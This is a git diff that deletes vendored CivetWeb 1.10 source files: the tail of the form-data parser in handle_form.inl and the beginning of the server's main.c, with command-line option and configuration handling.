-					mg_cry(conn, "%s: Cannot create file %s", __func__, path);
-				}
-			}
-
-			get_block = 0;
-			/* Loop to read values larger than sizeof(buf)-keylen-2 */
-			do {
-				next = strchr(val, '&');
-				if (next) {
-					vallen = next - val;
-					next++;
-					end_of_key_value_pair_found = 1;
-				} else {
-					vallen = (ptrdiff_t)strlen(val);
-					next = val + vallen;
-				}
-
-				if (field_storage == FORM_FIELD_STORAGE_GET) {
-#if 0
-					if (!end_of_key_value_pair_found && !all_data_read) {
-						/* This callback will deliver partial contents */
-					}
-#else
-					(void)all_data_read; /* avoid warning */
-#endif
-
-					/* Call callback */
-					url_encoded_field_get(conn,
-					                      ((get_block > 0) ? NULL : buf),
-					                      ((get_block > 0) ? 0
-					                                       : (size_t)keylen),
-					                      val,
-					                      (size_t)vallen,
-					                      fdh);
-					get_block++;
-				}
-				if (fstore.access.fp) {
-					size_t n = (size_t)
-					    fwrite(val, 1, (size_t)vallen, fstore.access.fp);
-					if ((n != (size_t)vallen) || (ferror(fstore.access.fp))) {
-						mg_cry(conn,
-						       "%s: Cannot write file %s",
-						       __func__,
-						       path);
-						mg_fclose(&fstore.access);
-						remove_bad_file(conn, path);
-					}
-					file_size += (int64_t)n;
-				}
-
-				if (!end_of_key_value_pair_found) {
-					used = next - buf;
-					memmove(buf,
-					        buf + (size_t)used,
-					        sizeof(buf) - (size_t)used);
-					buf_fill -= (int)used;
-					if ((size_t)buf_fill < (sizeof(buf) - 1)) {
-
-						size_t to_read = sizeof(buf) - 1 - (size_t)buf_fill;
-						r = mg_read(conn, buf + (size_t)buf_fill, to_read);
-						if (r < 0) {
-							/* read error */
-							return -1;
-						}
-						if (r != (int)to_read) {
-							/* TODO: Create a function to get "all_data_read"
-							 * from the conn object. All data is read if the
-							 * Content-Length has been reached, or if chunked
-							 * encoding is used and the end marker has been
-							 * read, or if the connection has been closed. */
-							all_data_read = 1;
-						}
-						buf_fill += r;
-						buf[buf_fill] = 0;
-						if (buf_fill < 1) {
-							break;
-						}
-						val = buf;
-					}
-				}
-
-			} while (!end_of_key_value_pair_found);
-
-			if (fstore.access.fp) {
-				r = mg_fclose(&fstore.access);
-				if (r == 0) {
-					/* stored successfully */
-					field_stored(conn, path, file_size, fdh);
-				} else {
-					mg_cry(conn, "%s: Error saving file %s", __func__, path);
-					remove_bad_file(conn, path);
-				}
-				fstore.access.fp = NULL;
-			}
-
-			/* Proceed to next entry */
-			used = next - buf;
-			memmove(buf, buf + (size_t)used, sizeof(buf) - (size_t)used);
-			buf_fill -= (int)used;
-		}
-
-		return field_count;
-	}
-
-	if (!mg_strncasecmp(content_type, "MULTIPART/FORM-DATA;", 20)) {
-		/* The form data is in the request body data, encoded as multipart
-		 * content (see https://www.ietf.org/rfc/rfc1867.txt,
-		 * https://www.ietf.org/rfc/rfc2388.txt). */
-		char *boundary;
-		size_t bl;
-		ptrdiff_t used;
-		struct mg_request_info part_header;
-		char *hbuf;
-		const char *content_disp, *hend, *fbeg, *fend, *nbeg, *nend;
-		const char *next;
-		unsigned part_no;
-
-		memset(&part_header, 0, sizeof(part_header));
-
-		/* Skip all spaces between MULTIPART/FORM-DATA; and BOUNDARY= */
-		bl = 20;
-		while (content_type[bl] == ' ') {
-			bl++;
-		}
-
-		/* There has to be a BOUNDARY definition in the Content-Type header */
-		if (mg_strncasecmp(content_type + bl, "BOUNDARY=", 9)) {
-			/* Malformed request */
-			return -1;
-		}
-
-		/* Copy boundary string to variable "boundary" */
-		fbeg = content_type + bl + 9;
-		bl = strlen(fbeg);
-		boundary = (char *)mg_malloc(bl + 1);
-		if (!boundary) {
-			/* Out of memory */
-			mg_cry(conn,
-			       "%s: Cannot allocate memory for boundary [%lu]",
-			       __func__,
-			       (unsigned long)bl);
-			return -1;
-		}
-		memcpy(boundary, fbeg, bl);
-		boundary[bl] = 0;
-
-		/* RFC 2046 permits the boundary string to be quoted. */
-		/* If the boundary is quoted, trim the quotes */
-		if (boundary[0] == '"') {
-			hbuf = strchr(boundary + 1, '"');
-			if ((!hbuf) || (*hbuf != '"')) {
-				/* Malformed request */
-				mg_free(boundary);
-				return -1;
-			}
-			*hbuf = 0;
-			memmove(boundary, boundary + 1, bl);
-			bl = strlen(boundary);
-		}
-
-		/* Do some sanity checks for boundary lengths */
-		if (bl > 70) {
-			/* From RFC 2046:
-			 * Boundary delimiters must not appear within the
-			 * encapsulated material, and must be no longer
-			 * than 70 characters, not counting the two
-			 * leading hyphens.
-			 */
-
-			/* The initial sanity check
-			 * (bl + 800 > sizeof(buf))
-			 * is no longer required, since sizeof(buf) == 1024
-			 *
-			 * Original comment:
-			 */
-			/* Sanity check:  The algorithm can not work if bl >= sizeof(buf),
-			 * and it will not work effectively, if the buf is only a few byte
-			 * larger than bl, or if buf can not hold the multipart header
-			 * plus the boundary.
-			 * Check some reasonable number here, that should be fulfilled by
-			 * any reasonable request from every browser. If it is not
-			 * fulfilled, it might be a hand-made request, intended to
-			 * interfere with the algorithm. */
-			mg_free(boundary);
-			return -1;
-		}
-		if (bl < 4) {
-			/* Sanity check:  A boundary string of less than 4 bytes makes
-			 * no sense either. */
-			mg_free(boundary);
-			return -1;
-		}
-
-		for (part_no = 0;; part_no++) {
-			size_t towrite, n;
-			int get_block;
-
-			r = mg_read(conn,
-			            buf + (size_t)buf_fill,
-			            sizeof(buf) - 1 - (size_t)buf_fill);
-			if (r < 0) {
-				/* read error */
-				mg_free(boundary);
-				return -1;
-			}
-			buf_fill += r;
-			buf[buf_fill] = 0;
-			if (buf_fill < 1) {
-				/* No data */
-				mg_free(boundary);
-				return -1;
-			}
-
-			if (part_no == 0) {
-				int d = 0;
-				while ((buf[d] != '-') && (d < buf_fill)) {
-					d++;
-				}
-				if ((d > 0) && (buf[d] == '-')) {
-					memmove(buf, buf + d, (unsigned)buf_fill - (unsigned)d);
-					buf_fill -= d;
-					buf[buf_fill] = 0;
-				}
-			}
-
-			if (buf[0] != '-' || buf[1] != '-') {
-				/* Malformed request */
-				mg_free(boundary);
-				return -1;
-			}
-			if (strncmp(buf + 2, boundary, bl)) {
-				/* Malformed request */
-				mg_free(boundary);
-				return -1;
-			}
-			if (buf[bl + 2] != '\r' || buf[bl + 3] != '\n') {
-				/* Every part must end with \r\n, if there is another part.
-				 * The end of the request has an extra -- */
-				if (((size_t)buf_fill != (size_t)(bl + 6))
-				    || (strncmp(buf + bl + 2, "--\r\n", 4))) {
-					/* Malformed request */
-					mg_free(boundary);
-					return -1;
-				}
-				/* End of the request */
-				break;
-			}
-
-			/* Next, we need to get the part header: Read until \r\n\r\n */
-			hbuf = buf + bl + 4;
-			hend = strstr(hbuf, "\r\n\r\n");
-			if (!hend) {
-				/* Malformed request */
-				mg_free(boundary);
-				return -1;
-			}
-
-			part_header.num_headers =
-			    parse_http_headers(&hbuf, part_header.http_headers);
-			if ((hend + 2) != hbuf) {
-				/* Malformed request */
-				mg_free(boundary);
-				return -1;
-			}
-
-			/* Skip \r\n\r\n */
-			hend += 4;
-
-			/* According to the RFC, every part has to have a header field like:
-			 * Content-Disposition: form-data; name="..." */
-			content_disp = get_header(part_header.http_headers,
-			                          part_header.num_headers,
-			                          "Content-Disposition");
-			if (!content_disp) {
-				/* Malformed request */
-				mg_free(boundary);
-				return -1;
-			}
-
-			/* Get the mandatory name="..." part of the Content-Disposition
-			 * header. */
-			nbeg = strstr(content_disp, "name=\"");
-			while ((nbeg != NULL) && (strcspn(nbeg - 1, ":,; \t") != 0)) {
-				/* It could be somethingname= instead of name= */
-				nbeg = strstr(nbeg + 1, "name=\"");
-			}
-
-			/* This line is not required, but otherwise some compilers
-			 * generate spurious warnings. */
-			nend = nbeg;
-			/* And others complain, the result is unused. */
-			(void)nend;
-
-			/* If name=" is found, search for the closing " */
-			if (nbeg) {
-				nbeg += 6;
-				nend = strchr(nbeg, '\"');
-				if (!nend) {
-					/* Malformed request */
-					mg_free(boundary);
-					return -1;
-				}
-			} else {
-				/* name= without quotes is also allowed */
-				nbeg = strstr(content_disp, "name=");
-				while ((nbeg != NULL) && (strcspn(nbeg - 1, ":,; \t") != 0)) {
-					/* It could be somethingname= instead of name= */
-					nbeg = strstr(nbeg + 1, "name=");
-				}
-				if (!nbeg) {
-					/* Malformed request */
-					mg_free(boundary);
-					return -1;
-				}
-				nbeg += 5;
-
-				/* RFC 2616 Sec. 2.2 defines a list of allowed
-				 * separators, but many of them make no sense
-				 * here, e.g. various brackets or slashes.
-				 * If they are used, probably someone is
-				 * trying to attack with curious hand made
-				 * requests. Only ; , space and tab seem to be
-				 * reasonable here. Ignore everything else. */
-				nend = nbeg + strcspn(nbeg, ",; \t");
-			}
-
-			/* Get the optional filename="..." part of the Content-Disposition
-			 * header. */
-			fbeg = strstr(content_disp, "filename=\"");
-			while ((fbeg != NULL) && (strcspn(fbeg - 1, ":,; \t") != 0)) {
-				/* It could be somethingfilename= instead of filename= */
-				fbeg = strstr(fbeg + 1, "filename=\"");
-			}
-
-			/* This line is not required, but otherwise some compilers
-			 * generate spurious warnings. */
-			fend = fbeg;
-
-			/* If filename=" is found, search for the closing " */
-			if (fbeg) {
-				fbeg += 10;
-				fend = strchr(fbeg, '\"');
-
-				if (!fend) {
-					/* Malformed request (the filename field is optional, but if
-					 * it exists, it needs to be terminated correctly). */
-					mg_free(boundary);
-					return -1;
-				}
-
-				/* TODO: check Content-Type */
-				/* Content-Type: application/octet-stream */
-			}
-			if (!fbeg) {
-				/* Try the same without quotes */
-				fbeg = strstr(content_disp, "filename=");
-				while ((fbeg != NULL) && (strcspn(fbeg - 1, ":,; \t") != 0)) {
-					/* It could be somethingfilename= instead of filename= */
-					fbeg = strstr(fbeg + 1, "filename=");
-				}
-				if (fbeg) {
-					fbeg += 9;
-					fend = fbeg + strcspn(fbeg, ",; \t");
-				}
-			}
-			if (!fbeg) {
-				fend = NULL;
-			}
-
-			/* In theory, it could be possible that someone crafts
-			 * a request like name=filename=xyz. Check if name and
-			 * filename do not overlap. */
-			if (!(((ptrdiff_t)fbeg > (ptrdiff_t)nend)
-			      || ((ptrdiff_t)nbeg > (ptrdiff_t)fend))) {
-				mg_free(boundary);
-				return -1;
-			}
-
-			/* Call callback for new field */
-			memset(path, 0, sizeof(path));
-			field_count++;
-			field_storage = url_encoded_field_found(conn,
-			                                        nbeg,
-			                                        (size_t)(nend - nbeg),
-			                                        fbeg,
-			                                        (size_t)(fend - fbeg),
-			                                        path,
-			                                        sizeof(path) - 1,
-			                                        fdh);
-
-			/* If the boundary is already in the buffer, get the address,
-			 * otherwise next will be NULL. */
-			next = search_boundary(hbuf,
-			                       (size_t)((buf - hbuf) + buf_fill),
-			                       boundary,
-			                       bl);
-
-			if (field_storage == FORM_FIELD_STORAGE_STORE) {
-				/* Store the content to a file */
-				if (mg_fopen(conn, path, MG_FOPEN_MODE_WRITE, &fstore) == 0) {
-					fstore.access.fp = NULL;
-				}
-				file_size = 0;
-
-				if (!fstore.access.fp) {
-					mg_cry(conn, "%s: Cannot create file %s", __func__, path);
-				}
-			}
-
-			get_block = 0;
-			while (!next) {
-				/* Set "towrite" to the number of bytes available
-				 * in the buffer */
-				towrite = (size_t)(buf - hend + buf_fill);
-				/* Subtract the boundary length, to deal with
-				 * cases the boundary is only partially stored
-				 * in the buffer. */
-				towrite -= bl + 4;
-
-				if (field_storage == FORM_FIELD_STORAGE_GET) {
-					unencoded_field_get(conn,
-					                    ((get_block > 0) ? NULL : nbeg),
-					                    ((get_block > 0)
-					                         ? 0
-					                         : (size_t)(nend - nbeg)),
-					                    hend,
-					                    towrite,
-					                    fdh);
-					get_block++;
-				}
-
-				if (field_storage == FORM_FIELD_STORAGE_STORE) {
-					if (fstore.access.fp) {
-
-						/* Store the content of the buffer. */
-						n = (size_t)fwrite(hend, 1, towrite, fstore.access.fp);
-						if ((n != towrite) || (ferror(fstore.access.fp))) {
-							mg_cry(conn,
-							       "%s: Cannot write file %s",
-							       __func__,
-							       path);
-							mg_fclose(&fstore.access);
-							remove_bad_file(conn, path);
-						}
-						file_size += (int64_t)n;
-					}
-				}
-
-				memmove(buf, hend + towrite, bl + 4);
-				buf_fill = (int)(bl + 4);
-				hend = buf;
-
-				/* Read new data */
-				r = mg_read(conn,
-				            buf + (size_t)buf_fill,
-				            sizeof(buf) - 1 - (size_t)buf_fill);
-				if (r < 0) {
-					/* read error */
-					mg_free(boundary);
-					return -1;
-				}
-				buf_fill += r;
-				buf[buf_fill] = 0;
-				if (buf_fill < 1) {
-					/* No data */
-					mg_free(boundary);
-					return -1;
-				}
-
-				/* Find boundary */
-				next = search_boundary(buf, (size_t)buf_fill, boundary, bl);
-			}
-
-			towrite = (size_t)(next - hend);
-
-			if (field_storage == FORM_FIELD_STORAGE_GET) {
-				/* Call callback */
-				unencoded_field_get(conn,
-				                    ((get_block > 0) ? NULL : nbeg),
-				                    ((get_block > 0) ? 0
-				                                     : (size_t)(nend - nbeg)),
-				                    hend,
-				                    towrite,
-				                    fdh);
-			}
-
-			if (field_storage == FORM_FIELD_STORAGE_STORE) {
-
-				if (fstore.access.fp) {
-					n = (size_t)fwrite(hend, 1, towrite, fstore.access.fp);
-					if ((n != towrite) || (ferror(fstore.access.fp))) {
-						mg_cry(conn,
-						       "%s: Cannot write file %s",
-						       __func__,
-						       path);
-						mg_fclose(&fstore.access);
-						remove_bad_file(conn, path);
-					} else {
-						file_size += (int64_t)n;
-						r = mg_fclose(&fstore.access);
-						if (r == 0) {
-							/* stored successfully */
-							field_stored(conn, path, file_size, fdh);
-						} else {
-							mg_cry(conn,
-							       "%s: Error saving file %s",
-							       __func__,
-							       path);
-							remove_bad_file(conn, path);
-						}
-					}
-					fstore.access.fp = NULL;
-				}
-			}
-
-			if ((field_storage & FORM_FIELD_STORAGE_ABORT)
-			    == FORM_FIELD_STORAGE_ABORT) {
-				/* Stop parsing the request */
-				break;
-			}
-
-			/* Remove from the buffer */
-			used = next - buf + 2;
-			memmove(buf, buf + (size_t)used, sizeof(buf) - (size_t)used);
-			buf_fill -= (int)used;
-		}
-
-		/* All parts handled */
-		mg_free(boundary);
-		return field_count;
-	}
-
-	/* Unknown Content-Type */
-	return -1;
-}
-
-
-/* End of handle_form.inl */
diff --git a/thirdparty/civetweb-1.10/src/main.c b/thirdparty/civetweb-1.10/src/main.c
deleted file mode 100644
index d8e9e9d..0000000
--- a/thirdparty/civetweb-1.10/src/main.c
+++ /dev/null
@@ -1,2856 +0,0 @@
-/* Copyright (c) 2013-2017 the Civetweb developers
- * Copyright (c) 2004-2013 Sergey Lyubka
- *
- * Permission is hereby granted, free of charge, to any person obtaining a copy
- * of this software and associated documentation files (the "Software"), to deal
- * in the Software without restriction, including without limitation the rights
- * to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
- * copies of the Software, and to permit persons to whom the Software is
- * furnished to do so, subject to the following conditions:
- *
- * The above copyright notice and this permission notice shall be included in
- * all copies or substantial portions of the Software.
- *
- * THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
- * IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
- * FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
- * AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
- * LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
- * OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN
- * THE SOFTWARE.
-*/
-
-#if defined(_WIN32)
-
-#ifndef _CRT_SECURE_NO_WARNINGS
-#define _CRT_SECURE_NO_WARNINGS /* Disable deprecation warning in VS2005 */
-#endif
-#ifndef _CRT_SECURE_NO_DEPRECATE
-#define _CRT_SECURE_NO_DEPRECATE
-#endif
-#ifdef WIN32_LEAN_AND_MEAN
-#undef WIN32_LEAN_AND_MEAN /* Required for some functions (tray icons, ...) */
-#endif
-
-#else
-
-#define _XOPEN_SOURCE 600 /* For PATH_MAX on linux */
-/* This should also be sufficient for "realpath", according to
- * http://man7.org/linux/man-pages/man3/realpath.3.html, but in
- * reality it does not seem to work. */
-/* In case this causes a problem, disable the warning:
- * #pragma GCC diagnostic ignored "-Wimplicit-function-declaration"
- * #pragma clang diagnostic ignored "-Wimplicit-function-declaration"
- */
-#endif
-
-#ifndef IGNORE_UNUSED_RESULT
-#define IGNORE_UNUSED_RESULT(a) ((void)((a) && 1))
-#endif
-
-#if defined(__cplusplus) && (__cplusplus >= 201103L)
-#define NO_RETURN [[noreturn]]
-#elif defined(__STDC_VERSION__) && (__STDC_VERSION__ >= 201112L)
-#define NO_RETURN _Noreturn
-#elif defined(__GNUC__)
-#define NO_RETURN __attribute((noreturn))
-#else
-#define NO_RETURN
-#endif
-
-/* Use same defines as in civetweb.c before including system headers. */
-#ifndef _LARGEFILE_SOURCE
-#define _LARGEFILE_SOURCE /* For fseeko(), ftello() */
-#endif
-#ifndef _FILE_OFFSET_BITS
-#define _FILE_OFFSET_BITS 64 /* Use 64-bit file offsets by default */
-#endif
-#ifndef __STDC_FORMAT_MACROS
-#define __STDC_FORMAT_MACROS /* <inttypes.h> wants this for C++ */
-#endif
-#ifndef __STDC_LIMIT_MACROS
-#define __STDC_LIMIT_MACROS /* C++ wants that for INT64_MAX */
-#endif
-
-#include <string.h>
-#include <errno.h>
-#include <sys/stat.h>
-#include <stdio.h>
-#include <stdint.h>
-#include <limits.h>
-#include <stdlib.h>
-#include <signal.h>
-#include <stddef.h>
-#include <stdarg.h>
-#include <ctype.h>
-#include <assert.h>
-
-#include "civetweb.h"
-
-#define printf                                                                 \
-	DO_NOT_USE_THIS_FUNCTION__USE_fprintf /* Required for unit testing */
-
-#if defined(_WIN32)                                                            \
-    && !defined(__SYMBIAN32__) /* WINDOWS / UNIX include block */
-#ifndef _WIN32_WINNT
-#define _WIN32_WINNT 0x0501 /* for tdm-gcc so we can use getconsolewindow */
-#endif
-#undef UNICODE
-#include <windows.h>
-#include <winsvc.h>
-#include <shlobj.h>
-#include <io.h>
-
-#define getcwd(a, b) (_getcwd(a, b))
-#if !defined(__MINGW32__)
-extern char *_getcwd(char *buf, size_t size);
-#endif
-
-#ifndef PATH_MAX
-#define PATH_MAX MAX_PATH
-#endif
-
-#ifndef S_ISDIR
-#define S_ISDIR(x) ((x)&_S_IFDIR)
-#endif
-
-#define DIRSEP '\\'
-#define snprintf _snprintf
-#define vsnprintf _vsnprintf
-#define sleep(x) (Sleep((x)*1000))
-#define WINCDECL __cdecl
-#define abs_path(rel, abs, abs_size) (_fullpath((abs), (rel), (abs_size)))
-
-#else /* defined(_WIN32) && !defined(__SYMBIAN32__) - WINDOWS / UNIX include   \
-         block */
-
-#include <unistd.h>
-#include <sys/utsname.h>
-#include <sys/wait.h>
-
-#define DIRSEP '/'
-#define WINCDECL
-#define abs_path(rel, abs, abs_size) (realpath((rel), (abs)))
-
-#endif /* defined(_WIN32) && !defined(__SYMBIAN32__) - WINDOWS / UNIX include  \
-          block */
-
-#ifndef PATH_MAX
-#define PATH_MAX (1024)
-#endif
-
-#define MAX_OPTIONS (50)
-#define MAX_CONF_FILE_LINE_SIZE (8 * 1024)
-
-struct tuser_data {
-	char *first_message;
-};
-
-
-static int g_exit_flag = 0;         /* Main loop should exit */
-static char g_server_base_name[40]; /* Set by init_server_name() */
-static const char *g_server_name;   /* Set by init_server_name() */
-static const char *g_icon_name;     /* Set by init_server_name() */
-static const char *g_website;       /* Set by init_server_name() */
-static char *g_system_info;         /* Set by init_system_info() */
-static char g_config_file_name[PATH_MAX] =
-    "";                          /* Set by process_command_line_arguments() */
-static struct mg_context *g_ctx; /* Set by start_civetweb() */
-static struct tuser_data
-    g_user_data; /* Passed to mg_start() by start_civetweb() */
-
-#if !defined(CONFIG_FILE)
-#define CONFIG_FILE "civetweb.conf"
-#endif /* !CONFIG_FILE */
-
-#if !defined(PASSWORDS_FILE_NAME)
-#define PASSWORDS_FILE_NAME ".htpasswd"
-#endif
-
-/* backup config file */
-#if !defined(CONFIG_FILE2) && defined(__linux__)
-#define CONFIG_FILE2 "/usr/local/etc/civetweb.conf"
-#endif
-
-enum { OPTION_TITLE, OPTION_ICON, OPTION_WEBPAGE, NUM_MAIN_OPTIONS };
-
-static struct mg_option main_config_options[] = {
-    {"title", CONFIG_TYPE_STRING, NULL},
-    {"icon", CONFIG_TYPE_STRING, NULL},
-    {"website", CONFIG_TYPE_STRING, NULL},
-    {NULL, CONFIG_TYPE_UNKNOWN, NULL}};
-
-
-static void WINCDECL
-signal_handler(int sig_num)
-{
-	g_exit_flag = sig_num;
-}
-
-
-static NO_RETURN void
-die(const char *fmt, ...)
-{
-	va_list ap;
-	char msg[512] = "";
-
-	va_start(ap, fmt);
-	(void)vsnprintf(msg, sizeof(msg) - 1, fmt, ap);
-	msg[sizeof(msg) - 1] = 0;
-	va_end(ap);
-
-#if defined(_WIN32)
-	MessageBox(NULL, msg, "Error", MB_OK);
-#else
-	fprintf(stderr, "%s\n", msg);
-#endif
-
-	exit(EXIT_FAILURE);
-}
-
-
-#ifdef WIN32
-static int MakeConsole(void);
-#endif
-
-
-static void
-show_server_name(void)
-{
-#ifdef WIN32
-	(void)MakeConsole();
-#endif
-
-	fprintf(stderr, "CivetWeb v%s, built on %s\n", mg_version(), __DATE__);
-}
-
-
-static NO_RETURN void
-show_usage_and_exit(const char *exeName)
-{
-	const struct mg_option *options;
-	int i;
-
-	if (exeName == 0 || *exeName == 0) {
-		exeName = "civetweb";
-	}
-
-	show_server_name();
-
-	fprintf(stderr, "\nUsage:\n");
-	fprintf(stderr, "  Start server with a set of options:\n");
-	fprintf(stderr, "    %s [config_file]\n", exeName);
-	fprintf(stderr, "    %s [-option value ...]\n", exeName);
-	fprintf(stderr, "  Show system information:\n");
-	fprintf(stderr, "    %s -I\n", exeName);
-	fprintf(stderr, "  Add user/change password:\n");
-	fprintf(stderr,
-	        "    %s -A <htpasswd_file> <realm> <user> <passwd>\n",
-	        exeName);
-	fprintf(stderr, "  Remove user:\n");
-	fprintf(stderr, "    %s -R <htpasswd_file> <realm> <user>\n", exeName);
-	fprintf(stderr, "\nOPTIONS:\n");
-
-	options = mg_get_valid_options();
-	for (i = 0; options[i].name != NULL; i++) {
-		fprintf(stderr,
-		        "  -%s %s\n",
-		        options[i].name,
-		        ((options[i].default_value == NULL)
-		             ? "<empty>"
-		             : options[i].default_value));
-	}
-
-	options = main_config_options;
-	for (i = 0; options[i].name != NULL; i++) {
-		fprintf(stderr,
-		        "  -%s %s\n",
-		        options[i].name,
-		        ((options[i].default_value == NULL)
-		             ? "<empty>"
-		             : options[i].default_value));
-	}
-
-	exit(EXIT_FAILURE);
-}
-
-
-#if defined(_WIN32) || defined(USE_COCOA)
-static const char *config_file_top_comment =
-    "# Civetweb web server configuration file.\n"
-    "# For detailed description of every option, visit\n"
-    "# https://github.com/civetweb/civetweb/blob/master/docs/UserManual.md\n"
-    "# Lines starting with '#' and empty lines are ignored.\n"
-    "# To make a change, remove leading '#', modify option's value,\n"
-    "# save this file and then restart Civetweb.\n\n";
-
-static const char *
-get_url_to_first_open_port(const struct mg_context *ctx)
-{
-	static char url[100];
-	const char *open_ports = mg_get_option(ctx, "listening_ports");
-	int a, b, c, d, port, n;
-
-	if (sscanf(open_ports, "%d.%d.%d.%d:%d%n", &a, &b, &c, &d, &port, &n)
-	    == 5) {
-		snprintf(url,
-		         sizeof(url),
-		         "%s://%d.%d.%d.%d:%d",
-		         open_ports[n] == 's' ? "https" : "http",
-		         a,
-		         b,
-		         c,
-		         d,
-		         port);
-	} else if (sscanf(open_ports, "%d%n", &port, &n) == 1) {
-		snprintf(url,
-		         sizeof(url),
-		         "%s://localhost:%d",
-		         open_ports[n] == 's' ? "https" : "http",
-		         port);
-	} else {
-		snprintf(url, sizeof(url), "%s", "http://localhost:8080");
-	}
-
-	return url;
-}
-
-
-#ifdef ENABLE_CREATE_CONFIG_FILE
-static void
-create_config_file(const struct mg_context *ctx, const char *path)
-{
-	const struct mg_option *options;
-	const char *value;
-	FILE *fp;
-	int i;
-
-	/* Create config file if it is not present yet */
-	if ((fp = fopen(path, "r")) != NULL) {
-		fclose(fp);
-	} else if ((fp = fopen(path, "a+")) != NULL) {
-		fprintf(fp, "%s", config_file_top_comment);
-		options = mg_get_valid_options();
-		for (i = 0; options[i].name != NULL; i++) {
-			value = mg_get_option(ctx, options[i].name);
-			fprintf(fp,
-			        "# %s %s\n",
-			        options[i].name,
-			        value ? value : "<value>");
-		}
-		fclose(fp);
-	}
-}
-#endif
-#endif
-
-
-static char *
-sdup(const char *str)
-{
-	size_t len;
-	char *p;
-
-	len = strlen(str) + 1;
-	if ((p = (char *)malloc(len)) != NULL) {
-		memcpy(p, str, len);
-	}
-	return p;
-}
-
-
-#if 0 /* Unused code from "string duplicate with escape" */
-static unsigned
-hex2dec(char x)
-{
-    if ((x >= '0') && (x <= '9')) {
-        return (unsigned)x - (unsigned)'0';
-    }
-    if ((x >= 'A') && (x <= 'F')) {
-        return (unsigned)x - (unsigned)'A' + 10u;
-    }
-    if ((x >= 'a') && (x <= 'f')) {
-        return (unsigned)x - (unsigned)'a' + 10u;
-    }
-    return 0;
-}
-
-
-static char *
-sdupesc(const char *str)
-{
-	char *p = sdup(str);
-
-	if (p) {
-		char *d = p;
-		while ((d = strchr(d, '\\')) != NULL) {
-			switch (d[1]) {
-			case 'a':
-				d[0] = '\a';
-				memmove(d + 1, d + 2, strlen(d + 1));
-				break;
-			case 'b':
-				d[0] = '\b';
-				memmove(d + 1, d + 2, strlen(d + 1));
-				break;
-			case 'e':
-				d[0] = 27;
-				memmove(d + 1, d + 2, strlen(d + 1));
-				break;
-			case 'f':
-				d[0] = '\f';
-				memmove(d + 1, d + 2, strlen(d + 1));
-				break;
-			case 'n':
-				d[0] = '\n';
-				memmove(d + 1, d + 2, strlen(d + 1));
-				break;
-			case 'r':
-				d[0] = '\r';
-				memmove(d + 1, d + 2, strlen(d + 1));
-				break;
-			case 't':
-				d[0] = '\t';
-				memmove(d + 1, d + 2, strlen(d + 1));
-				break;
-			case 'u':
-				if (isxdigit(d[2]) && isxdigit(d[3]) && isxdigit(d[4])
-				    && isxdigit(d[5])) {
-					unsigned short u = (unsigned short)(hex2dec(d[2]) * 4096
-					                                    + hex2dec(d[3]) * 256
-					                                    + hex2dec(d[4]) * 16
-					                                    + hex2dec(d[5]));
-					char mbc[16];
-					int mbl = wctomb(mbc, (wchar_t)u);
-					if ((mbl > 0) && (mbl < 6)) {
-						memcpy(d, mbc, (unsigned)mbl);
-						memmove(d + mbl, d + 6, strlen(d + 5));
-						/* Advance mbl characters (+1 is below) */
-						d += (mbl - 1);
-					} else {
-						/* Invalid multi byte character */
-						/* TODO: define what to do */
-					}
-				} else {
-					/* Invalid esc sequence */
-					/* TODO: define what to do */
-				}
-				break;
-			case 'v':
-				d[0] = '\v';
-				memmove(d + 1, d + 2, strlen(d + 1));
-				break;
-			case 'x':
-				if (isxdigit(d[2]) && isxdigit(d[3])) {
-					d[0] = (char)((unsigned char)(hex2dec(d[2]) * 16
-					                              + hex2dec(d[3])));
-					memmove(d + 1, d + 4, strlen(d + 3));
-				} else {
-					/* Invalid esc sequence */
-					/* TODO: define what to do */
-				}
-				break;
-			case 'z':
-				d[0] = 0;
-				memmove(d + 1, d + 2, strlen(d + 1));
-				break;
-			case '\\':
-				d[0] = '\\';
-				memmove(d + 1, d + 2, strlen(d + 1));
-				break;
-			case '\'':
-				d[0] = '\'';
-				memmove(d + 1, d + 2, strlen(d + 1));
-				break;
-			case '\"':
-				d[0] = '\"';
-				memmove(d + 1, d + 2, strlen(d + 1));
-				break;
-			case 0:
-				if (d == p) {
-					/* Line is only \ */
-					free(p);
-					return NULL;
-				}
-			/* no break */
-			default:
-				/* invalid ESC sequence */
-				/* TODO: define what to do */
-				break;
-			}
-
-			/* Advance to next character */
-			d++;
-		}
-	}
-	return p;
-}
-#endif
-
-
-static const char *
-get_option(char **options, const char *option_name)
-{
-	int i = 0;
-	const char *opt_value = NULL;
-
-	/* TODO (low, api makeover): options should be an array of key-value-pairs,
-	 * like
-	 *     struct {const char * key, const char * value} options[]
-	 * but it currently is an array with
-	 *     options[2*i] = key, options[2*i + 1] = value
-	 * (probably with a MG_LEGACY_INTERFACE definition)
-	 */
-	while (options[2 * i] != NULL) {
-		if (strcmp(options[2 * i], option_name) == 0) {
-			opt_value = options[2 * i + 1];
-			break;
-		}
-		i++;
-	}
-	return opt_value;
-}
-
-
-static int
-set_option(char **options, const char *name, const char *value)
-{
-	int i, type;
-	const struct mg_option *default_options = mg_get_valid_options();
-	const char *multi_sep = NULL;
-
-	for (i = 0; main_config_options[i].name != NULL; i++) {
-		if (0 == strcmp(name, main_config_options[i].name)) {
-			/* This option is evaluated by main.c, not civetweb.c - just skip it
-			 * and return OK */
-			return 1;
-		}
-	}
-
-	type = CONFIG_TYPE_UNKNOWN;
-	for (i = 0; default_options[i].name != NULL; i++) {
-		if (!strcmp(default_options[i].name, name)) {
-			type = default_options[i].type;
-		}
-	}
-	switch (type) {
-	case CONFIG_TYPE_UNKNOWN:
-		/* unknown option */
-		return 0;
-	case CONFIG_TYPE_NUMBER:
-		/* integer number >= 0, e.g. number of threads */
-		if (atol(value) < 0) {
-			/* invalid number */
-			return 0;
-		}
-		break;
-	case CONFIG_TYPE_STRING:
-		/* any text */
-		break;
-	case CONFIG_TYPE_STRING_LIST:
-		/* list of text items, separated by , */
-		multi_sep = ",";
-		break;
-	case CONFIG_TYPE_STRING_MULTILINE:
-		/* lines of text, separated by carriage return line feed */
-		multi_sep = "\r\n";
-		break;
